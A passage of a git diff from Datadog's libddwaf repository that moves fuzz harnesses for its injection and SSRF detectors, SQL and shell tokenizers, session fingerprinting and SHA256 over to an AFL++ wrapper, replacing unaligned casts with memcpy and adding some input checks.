addresses) { return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -// NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) -std::pair deserialize(const uint8_t *data, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto resource_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < resource_size) { - return {}; - } - - std::string_view resource{reinterpret_cast(data), resource_size}; - data += resource_size; - size -= resource_size; - - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto param_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < param_size) { - return {}; - } - - std::string_view param{reinterpret_cast(data), param_size}; - - return {resource, param}; -} - -uint8_t *serialize_string(uint8_t *Data, std::string_view str) -{ - std::size_t size = str.size(); - memcpy(Data, reinterpret_cast(&size), sizeof(std::size_t)); - Data += sizeof(std::size_t); - memcpy(Data, str.data(), size); - Data += size; - return Data; -} - -std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view param) -{ - Data = serialize_string(Data, resource); - serialize_string(Data, param); - return sizeof(std::size_t) * 2 + resource.size() + param.size(); -} -// NOLINTEND(cppcoreguidelines-pro-type-reinterpret-cast) - -// NOLINTNEXTLINE -extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) -{ - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); - - auto [resource, param] = deserialize(Data, Size); - MaxSize -= sizeof(std::size_t) * 2; - - std::string resource_buffer{resource.begin(), resource.end()}; - resource_buffer.resize(std::max(resource_buffer.size(), MaxSize / 2)); - - // 
NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - auto new_size = LLVMFuzzerMutate(reinterpret_cast(resource_buffer.data()), - resource.size(), resource_buffer.size()); - resource_buffer.resize(new_size); - - auto param_idx = rng() % new_size; - auto param_size = 1 + rng() % (new_size - param_idx); - - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; - auto param_buffer = resource_buffer.substr(param_idx, param_size); - return serialize(Data, resource_buffer, param_buffer); + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + // Create local file inclusion detector lfi_detector cond{{gen_param_def("server.io.fs.file", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + // Use input splitter to parse resource and param + InputSplitter splitter(data, size); + auto resource = splitter.get_string(); + auto param = splitter.get_remaining(); + // Create ddwaf objects ddwaf_object root; ddwaf_object tmp; ddwaf_object_map(&root); + + // Add filesystem file path ddwaf_object_map_add( &root, "server.io.fs.file", ddwaf_object_stringl(&tmp, resource.data(), resource.size())); + + // Add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); + // Create object store and evaluate condition object_store store; store.insert(root); ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + // Prevent compiler optimization + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization 
+AFL_FUZZ_TARGET_WITH_INIT("lfi_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/session_fingerprint/corpus/.gitkeep b/fuzzer/session_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/session_fingerprint/src/main.cpp b/fuzzer/session_fingerprint/src/main.cpp index 2b357c7f5..724e969da 100644 --- a/fuzzer/session_fingerprint/src/main.cpp +++ b/fuzzer/session_fingerprint/src/main.cpp @@ -2,22 +2,31 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create cookies object ddwaf_object cookies; ddwaf_object_map(&cookies); auto cookies_size = buffer.get(); @@ -29,16 +38,22 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create session fingerprint processor session_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{{}, {}, false, &cookies}}, {{{}, {}, false, buffer.get()}}, {{{}, {}, false, buffer.get()}}, cache, deadline); + // Clean up 
ddwaf_object_free(&cookies); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("session_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/sha256/corpus/.gitkeep b/fuzzer/sha256/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sha256/src/main.cpp b/fuzzer/sha256/src/main.cpp index 010750a7d..2b5cefaeb 100644 --- a/fuzzer/sha256/src/main.cpp +++ b/fuzzer/sha256/src/main.cpp @@ -2,24 +2,32 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "sha256.hpp" +#include -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) { return 0; } +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + // Create SHA256 hasher ddwaf::sha256_hash hasher; - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - hasher << std::string_view{reinterpret_cast(bytes), size}; - auto str = hasher.digest(); - // Force the compiler to not optimize away str - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(str) : : "memory"); + // Process the input data + auto input_view = bytes_to_string_view(data, size); + hasher << input_view; + + // Get the digest + auto result = hasher.digest(); + + // Prevent compiler optimization + prevent_optimization(result); return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("sha256_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/shell_tokenizer/corpus/.gitkeep b/fuzzer/shell_tokenizer/corpus/.gitkeep new file mode 100644 index 
000000000..e69de29bb diff --git a/fuzzer/shell_tokenizer/src/main.cpp b/fuzzer/shell_tokenizer/src/main.cpp index 8a1bf5211..5a218ad67 100644 --- a/fuzzer/shell_tokenizer/src/main.cpp +++ b/fuzzer/shell_tokenizer/src/main.cpp @@ -2,22 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "tokenizer/shell.hpp" #include -#include "tokenizer/shell.hpp" +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view query{reinterpret_cast(bytes), size}; + // Convert input to string_view for tokenization + auto query = bytes_to_string_view(data, size); + + // Create tokenizer and tokenize the input ddwaf::shell_tokenizer tokenizer(query); auto tokens = tokenizer.tokenize(); - // Force the compiler to not optimize away tokens - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(tokens) : : "memory"); + // Prevent compiler optimization + prevent_optimization(tokens); return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("shell_tokenizer_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/shi_detector_array/corpus/.gitkeep b/fuzzer/shi_detector_array/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/shi_detector_array/src/main.cpp b/fuzzer/shi_detector_array/src/main.cpp index 9dd842d8b..e136d45c5 100644 --- a/fuzzer/shi_detector_array/src/main.cpp +++ b/fuzzer/shi_detector_array/src/main.cpp @@ -2,27 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. 
// // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/shi_detector.hpp" #include #include -#include "condition/shi_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -33,7 +35,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -46,7 +49,12 @@ std::pair, std::string_view> deserialize( resource.reserve(resource_size); for (std::size_t i = 0; i < resource_size; ++i) { - const auto arg_size = *reinterpret_cast(data); + if (size < sizeof(std::size_t)) { + return {}; + } + + std::size_t arg_size; + std::memcpy(&arg_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -65,7 +73,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(&param_size, data, sizeof(std::size_t)); data +=
sizeof(std::size_t); size -= sizeof(std::size_t); @@ -181,23 +190,26 @@ extern "C" size_t LLVMFuzzerCustomMutator( return serializer{Data}.serialize(new_resource, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + shi_detector cond{{gen_param_def("server.sys.shell.cmd", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); ddwaf_object root; ddwaf_object tmp; ddwaf_object array; ddwaf_object_map(&root); - ddwaf_object_array(&array); for (auto arg : resource) { ddwaf_object_array_add(&array, ddwaf_object_stringl(&tmp, arg.data(), arg.size())); } + // Add shell command array ddwaf_object_map_add(&root, "server.sys.shell.cmd", &array); + + // Add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); @@ -206,7 +218,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("shi_detector_array_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/shi_detector_string/corpus/.gitkeep b/fuzzer/shi_detector_string/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/shi_detector_string/src/main.cpp b/fuzzer/shi_detector_string/src/main.cpp index 07293587a..632e9c884 100644 --- a/fuzzer/shi_detector_string/src/main.cpp +++ b/fuzzer/shi_detector_string/src/main.cpp @@ -2,27 +2,30 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. 
// // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/shi_detector.hpp" #include +#include #include -#include "condition/shi_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -32,7 +35,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -48,7 +52,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(&param_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -81,12 +86,18 @@ std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view extern "C" size_t LLVMFuzzerCustomMutator( // NOLINTNEXTLINE - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) + uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize,
unsigned int Seed) { - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); + static thread_local std::mt19937 rng; + rng.seed(Seed); auto [resource, param] = deserialize(Data, Size); + + // if deserialize failed, fall back to default mutation + if (resource.empty() && param.empty()) { + return LLVMFuzzerMutate(Data, Size, MaxSize); + } + MaxSize -= sizeof(std::size_t) * 2; std::string resource_buffer{resource.begin(), resource.end()}; @@ -97,6 +108,11 @@ extern "C" size_t LLVMFuzzerCustomMutator( resource.size(), resource_buffer.size()); resource_buffer.resize(new_size); + // avoid division by zero + if (new_size == 0) { + return LLVMFuzzerMutate(Data, Size, MaxSize); + } + auto param_idx = rng() % new_size; auto param_size = 1 + rng() % (new_size - param_idx); @@ -104,11 +120,16 @@ extern "C" size_t LLVMFuzzerCustomMutator( return serialize(Data, resource_buffer, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { shi_detector cond{{gen_param_def("server.sys.shell.cmd", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); + + // if deserialize failed, just return (no-op for invalid input) + if (resource.empty() && param.empty()) { + return 0; + } ddwaf_object root; ddwaf_object tmp; @@ -123,7 +144,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("shi_detector_string_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/sql_tokenizer/corpus/.gitkeep 
b/fuzzer/sql_tokenizer/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sql_tokenizer/src/main.cpp b/fuzzer/sql_tokenizer/src/main.cpp index b95597c4c..5daf071cf 100644 --- a/fuzzer/sql_tokenizer/src/main.cpp +++ b/fuzzer/sql_tokenizer/src/main.cpp @@ -2,55 +2,35 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "tokenizer/generic_sql.hpp" #include "tokenizer/mysql.hpp" #include "tokenizer/pgsql.hpp" -#include "tokenizer/sql_base.hpp" #include "tokenizer/sqlite.hpp" +#include -ddwaf::sql_dialect dialect = ddwaf::sql_dialect::generic; +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerInitialize(const int *argc, char ***argv) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - for (int i = 0; i < *argc; i++) { - std::string_view arg = (*argv)[i]; - if (arg.starts_with("--dialect=")) { - dialect = ddwaf::sql_dialect_from_type(arg.substr(sizeof("--dialect=") - 1)); - break; - } - } - return 0; -} + // Convert input to string_view for tokenization + auto query = bytes_to_string_view(data, size); -template [[clang::optnone]] void tokenize(std::string_view query) -{ - T tokenizer(query); - auto tokens = tokenizer.tokenize(); - // Force the compiler to not optimize away tokens - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(tokens) : : "memory"); -} + std::vector tokens; + tokens = ddwaf::generic_sql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::mysql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::pgsql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::sqlite_tokenizer(query).tokenize(); + prevent_optimization(tokens); -extern "C" int 
LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) -{ - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view query{reinterpret_cast(bytes), size}; - switch (dialect) { - case ddwaf::sql_dialect::mysql: - tokenize(query); - break; - case ddwaf::sql_dialect::pgsql: - tokenize(query); - break; - case ddwaf::sql_dialect::sqlite: - tokenize(query); - break; - default: - tokenize(query); - } return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("sql_tokenizer_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/sqli_detector/corpus/.gitkeep b/fuzzer/sqli_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sqli_detector/src/main.cpp b/fuzzer/sqli_detector/src/main.cpp index f2d8a453f..f00da6557 100644 --- a/fuzzer/sqli_detector/src/main.cpp +++ b/fuzzer/sqli_detector/src/main.cpp @@ -2,146 +2,75 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "condition/sqli_detector.hpp" #include "tokenizer/sql_base.hpp" +#include using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; +// Global dialect setting ddwaf::sql_dialect dialect = ddwaf::sql_dialect::generic; -extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); - -extern "C" int LLVMFuzzerInitialize(const int *argc, char ***argv) -{ - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - - for (int i = 0; i < *argc; i++) { - std::string_view arg = (*argv)[i]; - if (arg.starts_with("--dialect=")) { - dialect = ddwaf::sql_dialect_from_type(arg.substr(sizeof("--dialect=") - 1)); - break; - } - } - return 0; -} - template std::vector gen_param_def(Args... 
addresses) { return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -// NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) -std::pair deserialize(const uint8_t *data, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto resource_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < resource_size) { - return {}; - } - - std::string_view resource{reinterpret_cast(data), resource_size}; - data += resource_size; - size -= resource_size; - - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto param_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < param_size) { - return {}; - } - - std::string_view param{reinterpret_cast(data), param_size}; - - return {resource, param}; -} - -uint8_t *serialize_string(uint8_t *Data, std::string_view str) -{ - std::size_t size = str.size(); - memcpy(Data, reinterpret_cast(&size), sizeof(std::size_t)); - Data += sizeof(std::size_t); - memcpy(Data, str.data(), size); - Data += size; - return Data; -} - -std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view param) -{ - Data = serialize_string(Data, resource); - serialize_string(Data, param); - return sizeof(std::size_t) * 2 + resource.size() + param.size(); -} -// NOLINTEND(cppcoreguidelines-pro-type-reinterpret-cast) - -// NOLINTNEXTLINE -extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) -{ - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); - - auto [resource, param] = deserialize(Data, Size); - MaxSize -= sizeof(std::size_t) * 2; - - std::string resource_buffer{resource.begin(), resource.end()}; - resource_buffer.resize(std::max(resource_buffer.size(), MaxSize / 2)); - - // 
NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - auto new_size = LLVMFuzzerMutate(reinterpret_cast(resource_buffer.data()), - resource.size(), resource_buffer.size()); - resource_buffer.resize(new_size); - - auto param_idx = rng() % new_size; - auto param_size = 1 + rng() % (new_size - param_idx); - - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; - auto param_buffer = resource_buffer.substr(param_idx, param_size); - return serialize(Data, resource_buffer, param_buffer); + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +const std::vector dialects = { + "mysql", "mysql2", "postgresql", "pgsql", "sqlite", "oracle", "doctrine", "hsqldb"}; +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { sqli_detector cond{ {gen_param_def("server.db.statement", "server.request.query", "server.db.statement")}}; - auto [resource, param] = deserialize(bytes, size); + InputSplitter splitter(data, size); + auto resource = splitter.get_string(); + auto param = splitter.get_remaining(); ddwaf_object root; ddwaf_object tmp; ddwaf_object_map(&root); + + // add database statement ddwaf_object_map_add( &root, "server.db.statement", ddwaf_object_stringl(&tmp, resource.data(), resource.size())); + + // add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); - auto dialect_str = ddwaf::sql_dialect_to_string(dialect); - ddwaf_object_map_add(&root, "server.db.system", - ddwaf_object_stringl(&tmp, dialect_str.data(), dialect_str.size())); + // Check all the dialects with the same input + for (const auto &dialect_str : dialects) { + + ddwaf_object_map_add(&root, "server.db.system", + ddwaf_object_stringl(&tmp, dialect_str.data(), dialect_str.size())); - object_store store; - 
store.insert(root); + // create object store and evaluate condition + object_store store; + store.insert(root); - ddwaf::timer deadline{2s}; - condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + ddwaf::timer deadline{2s}; + condition_cache cache; + + // eval the sqli detector + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + prevent_optimization(result); + } return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("sqli_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/ssrf_detector/corpus/.gitkeep b/fuzzer/ssrf_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/ssrf_detector/src/main.cpp b/fuzzer/ssrf_detector/src/main.cpp index 55e555219..7c0a76043 100644 --- a/fuzzer/ssrf_detector/src/main.cpp +++ b/fuzzer/ssrf_detector/src/main.cpp @@ -2,27 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/ssrf_detector.hpp" #include #include -#include "condition/ssrf_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... 
addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -32,7 +34,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -48,7 +51,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(&param_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -81,10 +85,9 @@ std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view // NOLINTNEXTLINE extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) + uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, unsigned int Seed) { - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); + static thread_local std::mt19937 rng(Seed); auto [resource, param] = deserialize(Data, Size); MaxSize -= sizeof(std::size_t) * 2; @@ -100,17 +103,15 @@ extern "C" size_t LLVMFuzzerCustomMutator( auto param_idx = rng() % new_size; auto param_size = 1 + rng() % (new_size - param_idx); - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; auto param_buffer = resource_buffer.substr(param_idx, param_size); return serialize(Data, resource_buffer, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { ssrf_detector
cond{{gen_param_def("server.io.net.url", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); ddwaf_object root; ddwaf_object tmp; @@ -125,7 +126,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("ssrf_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/uri_parse/corpus/.gitkeep b/fuzzer/uri_parse/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/uri_parse/src/main.cpp b/fuzzer/uri_parse/src/main.cpp index 33eadd0b2..c68d7153f 100644 --- a/fuzzer/uri_parse/src/main.cpp +++ b/fuzzer/uri_parse/src/main.cpp @@ -2,18 +2,24 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. 
